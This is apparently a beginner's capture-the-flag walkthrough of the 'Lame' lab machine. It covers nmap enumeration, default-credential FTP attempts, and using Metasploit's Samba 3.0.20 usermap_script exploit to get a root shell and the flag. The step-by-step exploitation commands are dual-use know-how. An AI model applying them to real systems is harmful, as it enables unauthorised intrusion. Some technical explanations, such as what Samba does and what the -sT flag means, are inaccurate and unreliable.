- MACHINE — LAME
- IP — 10.10.10.3
- OS — linux based
This machine is useful to practice basic skills of metasploits and as a beginner to get hands on in simple steps to launch an exploit on a vulnerable machine.
1. First, I started from nmap to do the target enumeration
Sudo nmap -sT -sV -O -A –version-light 10.10.10.3
- -sT = TCP /SYN/Connect()/ACK/Window/Maimon scan
- -sV = Probe open ports to determine service/version info
- -O = Enable OS detection
- -A= Enable OS detection, version detection, script scanning, and traceroute
- -version-light = Limit to most likely probes (Intensity 2)
After completing nmap, you will get a rough Idea about the target and which ports are open and closed.According to ‘Lame’ I found that Samba 3.0.20 is a vulnerable software used to block messages in network protocols same as SMB (Server Message Block) helping ActiveDirectory and Data sharing.
For further information
2. Internet search
As the second step I tried to connect with File Transfer Protocol (ftp) through internet.I found that there is a ftp server which auto generates directories by clicking “Up to higher level directory”
3. Trying to connect with ftp on terminal
As the third step, I blind tested to connect ftp through the terminal and tried several default usernames and passwords. But I could not gain access despite several attempts.
4. Searching exploits
As the fourth step I search Samba 3.0.20 exploit in searchsploit database to find an ideal module.
searchsploit Samba 3.0.20
I found that unix/remote/16320.rb is in the Metasploit database.
What is Metasploit?
Simply metasploit is a framework which contains any previous exploited modules within its database. It is a free tool for linux users and also, you can find exploits online in rapid7 , exploit database, CVE (Common Vulnerabilities and Exploits) and many more.
Links are as following
more reference in msfconsole ( Metasploit )
5. Using Metasploit
I opened Metasploit by using command “msfconsole”
6. Search the exploit in msf-database
According to searchsploit result, I searched the specific module using command
- Search Samba 3.0.20
7. Use module
I used the exploit for the usermap script.
8. Configure exploit according to the target
After setting up the module we need to configure the exploit according to the target environment. So, I used the following commands to configure the Remote Host and the Local Host.
- Show options (To see the options configured)
- Set RHOST 10.10.10.3
- Set LHOST 10.10.14.58 (call back address of local host tun0)
9. When the configuring of the exploit is done, it is already prepared to run the exploit.
10. Gaining into the server.
To check which Operating system is running on the target, I typed command “whoami”. As the results I got “root”. Because the host is running in linux kernel, I used linux commands to list all directories and got the user.txt file .
The flag to the user found in User.txt file directory.
SEE YOU IN THE NEXT MACHINE……….